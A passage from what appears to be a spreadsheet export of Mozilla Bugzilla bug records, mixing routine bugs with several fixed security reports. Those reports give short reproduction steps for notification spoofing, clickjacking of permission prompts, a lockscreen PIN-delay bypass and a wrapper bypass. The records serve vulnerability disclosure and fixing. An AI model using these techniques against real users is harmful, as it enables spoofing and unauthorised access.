          <t>2022-08-07 09:58:36 -0700</t>
        </is>
      </c>
      <c r="C4368" t="inlineStr">
        <is>
          <t>Block the fullscreen notification on Android using download popups</t>
        </is>
      </c>
      <c r="D4368" t="inlineStr">
        <is>
          <t>2024-05-30 10:58:32 -0700</t>
        </is>
      </c>
      <c r="E4368" t="n">
        <v>1</v>
      </c>
      <c r="F4368" t="n">
        <v>1</v>
      </c>
      <c r="G4368" t="n">
        <v>2</v>
      </c>
      <c r="H4368" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4368" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J4368" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4368" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4368" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4368" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4368" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4368" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4368" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main111+]</t>
        </is>
      </c>
      <c r="Q4368" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4368" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4368" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T4368" t="n">
        <v>1</v>
      </c>
      <c r="U4368" t="n">
        <v>0</v>
      </c>
      <c r="V4368" t="n">
        <v>34</v>
      </c>
      <c r="W4368" t="inlineStr">
        <is>
          <t>Created attachment 9288732
poc.html
When entering fullscreen, the fullscreen notification is essential to warn users that they are entering fullscreen on the site to prevent spoofing attacks as the fullscreen mode lacks the omnibox. See https://www.mozilla.org/en-US/security/advisories/mfsa2022-17/#CVE-2022-29914 for instance.
It is possible to block the fullscreen notification on Firefox by using download popups.
REPRODUCTION STEPS (Tested on Firefox 103.2.0 on Android) :
1. Open the file below on Firefox on Android (with the omnibox at the bottom, which seems to be the default for me.)
2. Click on the button, the download popup will appear below which will block the fullscreen notification which will also appear at the bottom</t>
        </is>
      </c>
      <c r="X4368" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4369">
      <c r="A4369" t="n">
        <v>646586</v>
      </c>
      <c r="B4369" t="inlineStr">
        <is>
          <t>2011-03-30 12:18:59 -0700</t>
        </is>
      </c>
      <c r="C4369" t="inlineStr">
        <is>
          <t>Redirect Spark promo on JA build to EN-US</t>
        </is>
      </c>
      <c r="D4369" t="inlineStr">
        <is>
          <t>2011-04-12 10:38:29 -0700</t>
        </is>
      </c>
      <c r="E4369" t="n">
        <v>1</v>
      </c>
      <c r="F4369" t="n">
        <v>1</v>
      </c>
      <c r="G4369" t="n">
        <v>5</v>
      </c>
      <c r="H4369" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4369" t="inlineStr">
        <is>
          <t>Websites</t>
        </is>
      </c>
      <c r="J4369" t="inlineStr">
        <is>
          <t>spark.mozilla.org</t>
        </is>
      </c>
      <c r="K4369" t="inlineStr">
        <is>
          <t>Firefox 4</t>
        </is>
      </c>
      <c r="L4369" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4369" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4369" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4369" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4369" t="inlineStr"/>
      <c r="Q4369" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4369" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4369" t="inlineStr">
        <is>
          <t>1.1</t>
        </is>
      </c>
      <c r="T4369" t="n">
        <v>1</v>
      </c>
      <c r="U4369" t="n">
        <v>0</v>
      </c>
      <c r="V4369" t="n">
        <v>5</v>
      </c>
      <c r="W4369" t="inlineStr">
        <is>
          <t>Because of the font/crash issue on the Japanese Spark site, can we place a redirect on /ja/ to /en-Us/ until this is addressed in 4.0.1 (~April 14)?</t>
        </is>
      </c>
      <c r="X4369" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4370">
      <c r="A4370" t="n">
        <v>213228</v>
      </c>
      <c r="B4370" t="inlineStr">
        <is>
          <t>2003-07-20 09:31:27 -0700</t>
        </is>
      </c>
      <c r="C4370" t="inlineStr">
        <is>
          <t>new toolkit independence bug</t>
        </is>
      </c>
      <c r="D4370" t="inlineStr">
        <is>
          <t>2018-11-26 09:45:22 -0800</t>
        </is>
      </c>
      <c r="E4370" t="n">
        <v>1</v>
      </c>
      <c r="F4370" t="n">
        <v>1</v>
      </c>
      <c r="G4370" t="n">
        <v>7</v>
      </c>
      <c r="H4370" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4370" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J4370" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4370" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4370" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4370" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4370" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4370" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4370" t="inlineStr"/>
      <c r="Q4370" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4370" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4370" t="inlineStr">
        <is>
          <t>Firefox1.0</t>
        </is>
      </c>
      <c r="T4370" t="n">
        <v>1</v>
      </c>
      <c r="U4370" t="n">
        <v>0</v>
      </c>
      <c r="V4370" t="n">
        <v>16</v>
      </c>
      <c r="W4370" t="inlineStr">
        <is>
          <t>Currently, toolkit.jar is built in xpfe/global and a second pass in
mozilla/toolkit overwrites and adds the new files.
We end up with unnecessary files and a duplication of the widgets in particular.
Since more and more apps are using the new toolkit, we need to stabilize a set
of files that we need and reject those we don't.</t>
        </is>
      </c>
      <c r="X4370" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4371">
      <c r="A4371" t="n">
        <v>637994</v>
      </c>
      <c r="B4371" t="inlineStr">
        <is>
          <t>2011-03-01 19:55:04 -0800</t>
        </is>
      </c>
      <c r="C4371" t="inlineStr">
        <is>
          <t>Inherited non-configurable accessor properties mis-reported as own properties</t>
        </is>
      </c>
      <c r="D4371" t="inlineStr">
        <is>
          <t>2011-09-27 13:47:00 -0700</t>
        </is>
      </c>
      <c r="E4371" t="n">
        <v>1</v>
      </c>
      <c r="F4371" t="n">
        <v>1</v>
      </c>
      <c r="G4371" t="n">
        <v>3</v>
      </c>
      <c r="H4371" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4371" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4371" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4371" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L4371" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4371" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4371" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4371" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4371" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q4371" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4371" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4371" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4371" t="n">
        <v>1</v>
      </c>
      <c r="U4371" t="n">
        <v>0</v>
      </c>
      <c r="V4371" t="n">
        <v>28</v>
      </c>
      <c r="W4371" t="inlineStr">
        <is>
          <t>On Minefield 4.0b13pre (2011-03-01)
&gt; var gopd = Object.getOwnPropertyDescriptor
&gt; gopd
function getOwnPropertyDescriptor() { [native code] }
&gt; Object.defineProperty(Function.prototype, 'ident___', { get: function(){return "gotten";} });
&gt; Array.ident___
gotten
&gt; gopd(Array, 'ident___')
[object Object]
&gt; gopd(Array, 'ident___').get()
gotten
&gt; Object.getOwnPropertyDescriptor(Array, 'ident___')
[object Object]
&gt; Array.hasOwnProperty('ident___')
true</t>
        </is>
      </c>
      <c r="X4371" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4372">
      <c r="A4372" t="n">
        <v>855885</v>
      </c>
      <c r="B4372" t="inlineStr">
        <is>
          <t>2013-03-28 15:35:47 -0700</t>
        </is>
      </c>
      <c r="C4372" t="inlineStr">
        <is>
          <t>Look up by slug</t>
        </is>
      </c>
      <c r="D4372" t="inlineStr">
        <is>
          <t>2013-04-08 14:38:41 -0700</t>
        </is>
      </c>
      <c r="E4372" t="n">
        <v>1</v>
      </c>
      <c r="F4372" t="n">
        <v>1</v>
      </c>
      <c r="G4372" t="n">
        <v>6</v>
      </c>
      <c r="H4372" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4372" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J4372" t="inlineStr">
        <is>
          <t>API</t>
        </is>
      </c>
      <c r="K4372" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L4372" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4372" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4372" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4372" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4372" t="inlineStr">
        <is>
          <t>[fireplace] p=1</t>
        </is>
      </c>
      <c r="Q4372" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4372" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4372" t="inlineStr">
        <is>
          <t>2013-04-04</t>
        </is>
      </c>
      <c r="T4372" t="n">
        <v>1</v>
      </c>
      <c r="U4372" t="n">
        <v>0</v>
      </c>
      <c r="V4372" t="n">
        <v>2</v>
      </c>
      <c r="W4372" t="inlineStr">
        <is>
          <t>We need to lookup by slug (or primary key) the following:
- apps
- categories
Let's add this into the urls for those resources.</t>
        </is>
      </c>
      <c r="X4372" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4373">
      <c r="A4373" t="n">
        <v>1384256</v>
      </c>
      <c r="B4373" t="inlineStr">
        <is>
          <t>2017-07-25 12:29:08 -0700</t>
        </is>
      </c>
      <c r="C4373" t="inlineStr">
        <is>
          <t>uninterruptible reflow at _openAutocompletePopup@chrome://browser/content/urlbarBindings.xml:1854</t>
        </is>
      </c>
      <c r="D4373" t="inlineStr">
        <is>
          <t>2017-10-06 11:53:00 -0700</t>
        </is>
      </c>
      <c r="E4373" t="n">
        <v>1</v>
      </c>
      <c r="F4373" t="n">
        <v>1</v>
      </c>
      <c r="G4373" t="n">
        <v>2</v>
      </c>
      <c r="H4373" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4373" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4373" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K4373" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4373" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4373" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4373" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4373" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4373" t="inlineStr">
        <is>
          <t>[reserve-photon-performance][fxsearch]</t>
        </is>
      </c>
      <c r="Q4373" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4373" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4373" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4373" t="n">
        <v>1</v>
      </c>
      <c r="U4373" t="n">
        <v>0</v>
      </c>
      <c r="V4373" t="n">
        <v>2</v>
      </c>
      <c r="W4373" t="inlineStr">
        <is>
          <t>Here's the stack:
"_openAutocompletePopup@chrome://browser/content/urlbarBindings.xml:1854:15",
"openAutocompletePopup@chrome://browser/content/urlbarBindings.xml:1803:11",
"openPopup@chrome://global/content/bindings/autocomplete.xml:393:13",
"set_popupOpen@chrome://global/content/bindings/autocomplete.xml:103:10",
"notifyResults@file:///Users/mikeconley/Projects/mozilla-central/obj-x86_64-apple-darwin14.5.0/dist/Nightly.app/Contents/Resources/components/UnifiedComplete.js:2193:5",
"_addMatch@file:///Users/mikeconley/Projects/mozilla-central/obj-x86_64-apple-darwin14.5.0/dist/Nightly.app/Contents/Resources/components/UnifiedComplete.js:1822:5",
"_addSearchEngineMatch@file:///Users/mikeconley/Projects/mozilla-central/obj-x86_64-apple-darwin14.5.0/dist/Nightly.app/Contents/Resources/components/UnifiedComplete.js:1570:5",
"_matchCurrentSearchEngine@file:///Users/mikeconley/Projects/mozilla-central/obj-x86_64-apple-darwin14.5.0/dist/Nightly.app/Contents/Resources/components/UnifiedComplete.js:1525:5",
There's some pre-processing that's shifting the line numbers on us, but I've tracked this down to these lines:
http://searchfox.org/mozilla-central/rev/3a3af33f513071ea829debdfbc628caebcdf6996/browser/base/content/urlbarBindings.xml#1867-1868</t>
        </is>
      </c>
      <c r="X4373" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4374">
      <c r="A4374" t="n">
        <v>1886082</v>
      </c>
      <c r="B4374" t="inlineStr">
        <is>
          <t>2024-03-18 20:22:02 -0700</t>
        </is>
      </c>
      <c r="C4374" t="inlineStr">
        <is>
          <t>Clickjacking to allow permission via popup (window.open) and webauthn OS dialog (Windows)</t>
        </is>
      </c>
      <c r="D4374" t="inlineStr">
        <is>
          <t>2024-09-18 19:41:01 -0700</t>
        </is>
      </c>
      <c r="E4374" t="n">
        <v>1</v>
      </c>
      <c r="F4374" t="n">
        <v>1</v>
      </c>
      <c r="G4374" t="n">
        <v>3</v>
      </c>
      <c r="H4374" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4374" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4374" t="inlineStr">
        <is>
          <t>PopupNotifications and Notification Bars</t>
        </is>
      </c>
      <c r="K4374" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4374" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M4374" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N4374" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4374" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4374" t="inlineStr">
        <is>
          <t xml:space="preserve">[reporter-external] [client-bounty-form] [verif?]  [adv-main126+] [adv-ESR115.11+] </t>
        </is>
      </c>
      <c r="Q4374" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4374" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4374" t="inlineStr">
        <is>
          <t>127 Branch</t>
        </is>
      </c>
      <c r="T4374" t="n">
        <v>1</v>
      </c>
      <c r="U4374" t="n">
        <v>0</v>
      </c>
      <c r="V4374" t="n">
        <v>41</v>
      </c>
      <c r="W4374" t="inlineStr">
        <is>
          <t>Created attachment 9391919
bandicam 2024-03-19 10-16-51-769.mp4
I found a clickjacking vulnerability to allow permission using window open.
steps to reproduce:
1. open https://coral-shadowed-parrot.glitch.me/clickjack.html or open clickjack.html
2. Click on "Go to Game" button
3. Do Triple Click
Operating System : Windows 10
Firefox version : Firefox Nightly version 126.0a1 (2024-03-18) (64-bit)</t>
        </is>
      </c>
      <c r="X4374" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4375">
      <c r="A4375" t="n">
        <v>1181571</v>
      </c>
      <c r="B4375" t="inlineStr">
        <is>
          <t>2015-07-08 06:37:10 -0700</t>
        </is>
      </c>
      <c r="C4375" t="inlineStr">
        <is>
          <t>Lockscreen delay bypass in Firefox OS</t>
        </is>
      </c>
      <c r="D4375" t="inlineStr">
        <is>
          <t>2016-07-02 11:08:54 -0700</t>
        </is>
      </c>
      <c r="E4375" t="n">
        <v>1</v>
      </c>
      <c r="F4375" t="n">
        <v>1</v>
      </c>
      <c r="G4375" t="n">
        <v>6</v>
      </c>
      <c r="H4375" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4375" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4375" t="inlineStr">
        <is>
          <t>Gaia::System::Lockscreen</t>
        </is>
      </c>
      <c r="K4375" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4375" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4375" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4375" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4375" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4375" t="inlineStr">
        <is>
          <t>[b2g-adv-main2.5+]</t>
        </is>
      </c>
      <c r="Q4375" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4375" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4375" t="inlineStr">
        <is>
          <t>FxOS-S6 (04Sep)</t>
        </is>
      </c>
      <c r="T4375" t="n">
        <v>1</v>
      </c>
      <c r="U4375" t="n">
        <v>0</v>
      </c>
      <c r="V4375" t="n">
        <v>50</v>
      </c>
      <c r="W4375" t="inlineStr">
        <is>
          <t>STR:
1) Lock the screen with a PIN
2) Try an incorrect PIN multiple times.
3) Observe how the delay for trying again gets longer and longer
4) While waiting with the red buttons still glowing, press the home button (or power twice, to lock and unlock again)
5) Note how you can try another pin just right away.</t>
        </is>
      </c>
      <c r="X4375" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4376">
      <c r="A4376" t="n">
        <v>498990</v>
      </c>
      <c r="B4376" t="inlineStr">
        <is>
          <t>2009-06-17 13:38:23 -0700</t>
        </is>
      </c>
      <c r="C4376" t="inlineStr">
        <is>
          <t>updates not working going from rc1 to rc2</t>
        </is>
      </c>
      <c r="D4376" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4376" t="n">
        <v>1</v>
      </c>
      <c r="F4376" t="n">
        <v>1</v>
      </c>
      <c r="G4376" t="n">
        <v>5</v>
      </c>
      <c r="H4376" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4376" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4376" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4376" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4376" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4376" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4376" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4376" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4376" t="inlineStr"/>
      <c r="Q4376" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4376" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4376" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4376" t="n">
        <v>1</v>
      </c>
      <c r="U4376" t="n">
        <v>0</v>
      </c>
      <c r="V4376" t="n">
        <v>4</v>
      </c>
      <c r="W4376" t="inlineStr">
        <is>
          <t>Tracking bug. While testing updates on the betatest channel QA found problems going from 3.5rc1(build2) to 3.5rc2(build2). The problem has already been identified: The problem was in the value of extensionVersion, which was set to "3.5rc2" instead of "3.5".</t>
        </is>
      </c>
      <c r="X4376" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4377">
      <c r="A4377" t="n">
        <v>677847</v>
      </c>
      <c r="B4377" t="inlineStr">
        <is>
          <t>2011-08-09 22:27:02 -0700</t>
        </is>
      </c>
      <c r="C4377" t="inlineStr">
        <is>
          <t>Crash [@ nsContentUtils::IsEventAttributeName ] at address 0x55555555 with malloc scribble</t>
        </is>
      </c>
      <c r="D4377" t="inlineStr">
        <is>
          <t>2020-12-10 23:59:01 -0800</t>
        </is>
      </c>
      <c r="E4377" t="n">
        <v>1</v>
      </c>
      <c r="F4377" t="n">
        <v>1</v>
      </c>
      <c r="G4377" t="n">
        <v>3</v>
      </c>
      <c r="H4377" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4377" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4377" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4377" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4377" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4377" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4377" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4377" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4377" t="inlineStr">
        <is>
          <t>[sg:critical?][qa!]</t>
        </is>
      </c>
      <c r="Q4377" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4377" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4377" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T4377" t="n">
        <v>1</v>
      </c>
      <c r="U4377" t="n">
        <v>0</v>
      </c>
      <c r="V4377" t="n">
        <v>14</v>
      </c>
      <c r="W4377" t="inlineStr">
        <is>
          <t>Created attachment 552026
stack
1. enable scribble on mac
2. http://vnexpress.net/RSS/GL/trang-chu.rss
   or
   http://ax.itunes.apple.com/WebObjects/MZStoreServices.woa/ws/RSS/topsongs/limit=25/xml
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x55555555
0x054461ec in nsContentUtils::IsEventAttributeName (aName=0x25b84380, aType=1) at /work/mozilla/builds/nightly/mozilla/content/base/src/nsContentUtils.cpp:2919
2919	  if (name[0] != 'o' || name[1] != 'n')
0x55 is deleted memory in scribble
bug 675437 supposedly fixed the crash.
Windows crashes with address 0xffffffffdddddddd (also deleted memory). I don't see this on Linux.</t>
        </is>
      </c>
      <c r="X4377" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4378">
      <c r="A4378" t="n">
        <v>497102</v>
      </c>
      <c r="B4378" t="inlineStr">
        <is>
          <t>2009-06-09 07:51:56 -0700</t>
        </is>
      </c>
      <c r="C4378" t="inlineStr">
        <is>
          <t>Bypassing XOW by using a shallow XPCNativeWrapper and a numeric property</t>
        </is>
      </c>
      <c r="D4378" t="inlineStr">
        <is>
          <t>2009-07-23 04:58:29 -0700</t>
        </is>
      </c>
      <c r="E4378" t="n">
        <v>1</v>
      </c>
      <c r="F4378" t="n">
        <v>1</v>
      </c>
      <c r="G4378" t="n">
        <v>3</v>
      </c>
      <c r="H4378" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4378" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4378" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4378" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4378" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4378" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4378" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4378" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4378" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q4378" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4378" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4378" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4378" t="n">
        <v>1</v>
      </c>
      <c r="U4378" t="n">
        <v>0</v>
      </c>
      <c r="V4378" t="n">
        <v>18</v>
      </c>
      <c r="W4378" t="inlineStr">
        <is>
          <t>When a numeric property of a window is accessed and the numeric property is a
subframe, nsWindowSH::GetProperty does not call nsXPConnect::GetXOWForObject. 
Thus, it's possible to bypass XOW by using a shallow XPCNativeWrapper.</t>
        </is>
      </c>
      <c r="X4378" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4379">
      <c r="A4379" t="n">
        <v>380635</v>
      </c>
      <c r="B4379" t="inlineStr">
        <is>
          <t>2007-05-14 07:16:16 -0700</t>
        </is>
      </c>
      <c r="C4379" t="inlineStr">
        <is>
          <t>add TURKTRUST root CA certificates</t>
        </is>
      </c>
      <c r="D4379" t="inlineStr">
        <is>
          <t>2022-11-14 14:23:30 -0800</t>
        </is>
      </c>
      <c r="E4379" t="n">
        <v>1</v>
      </c>
      <c r="F4379" t="n">
        <v>1</v>
      </c>
      <c r="G4379" t="n">
        <v>5</v>
      </c>
      <c r="H4379" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4379" t="inlineStr">
        <is>
          <t>CA Program</t>
        </is>
      </c>
      <c r="J4379" t="inlineStr">
        <is>
          <t>CA Certificate Root Program</t>
        </is>
      </c>
      <c r="K4379" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4379" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4379" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4379" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4379" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4379" t="inlineStr"/>
      <c r="Q4379" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4379" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4379" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4379" t="n">
        <v>1</v>
      </c>
      <c r="U4379" t="n">
        <v>1</v>
      </c>
      <c r="V4379" t="n">
        <v>47</v>
      </c>
      <c r="W4379" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
This bug report has been completed to fulfill the formality for adding TURKTRUST root CA certificates to Mozilla software certificate stores.
TÜRKTRUST Bilgi, İletişim ve Bilişim Güvenliği Hizmetleri A.Ş. (TÜRKTRUST Information Security Services, Inc.) is established as a corporate company for providing qualified electronic certificates as well as SSL or other certificate types and related services in Turkey. TÜRKTRUST heavily invested in the infrastructure; namely building, personnel, hardware, software, etc., and successfully operates its CA processes since July 2005. 
Regarding the related legislation, Electronic Signature Law of Turkey (No. 5070) has passed the parliament approval on January 24, 2004, and enacted after 6 months of the parliament approval. The law is based on the EU Directive on Electronic Signatures of 1999, which presupposes a free market regulated by a Regulatory Body. The Telecommunications Authority of Turkey (TK -  http://www.tk.gov.tr) is depicted as the regulatory body by the law. TK is thus responsible for publishing the administrative and technical ordinances, and implementing necessary audits to allow the operation of a certificate service provider as a qualified certificate issuer. Please check the link http://www.tk.gov.tr/eimza/eshs.htm at TK’s web site to see the list of approved certificate service providers in Turkey. 
TÜRKTRUST root and sub-root certificates are recognized by Microsoft products since the year end of 2005 through the Authority Information Access (AIA) path of the related certificates. Our company contact information is as follows:
TÜRKTRUST Bilgi, İletişim ve Bilişim Güvenliği Hizmetleri A.Ş. 
(TÜRKTRUST Data, Communication and Information Security Services, Inc.)
Address: Hollanda Cad. 62. Sokak No.7 Yıldız Çankaya ANKARA 06550 TURKEY
Phone: +90 (312) 439 10 00
Fax: +90 (312) 439 10 01
http://www.turktrust.com.tr
We want to submit two root CA certificates. Our certificates (the two mentioned root certificates and their related subroot certificates) and Certificate Practice Statement can be obtained from the corresponding attachments.
The information that you want as a summary is explained below:
CA Details 
------------------- 
CA Name: TÜRKTRUST Root CA
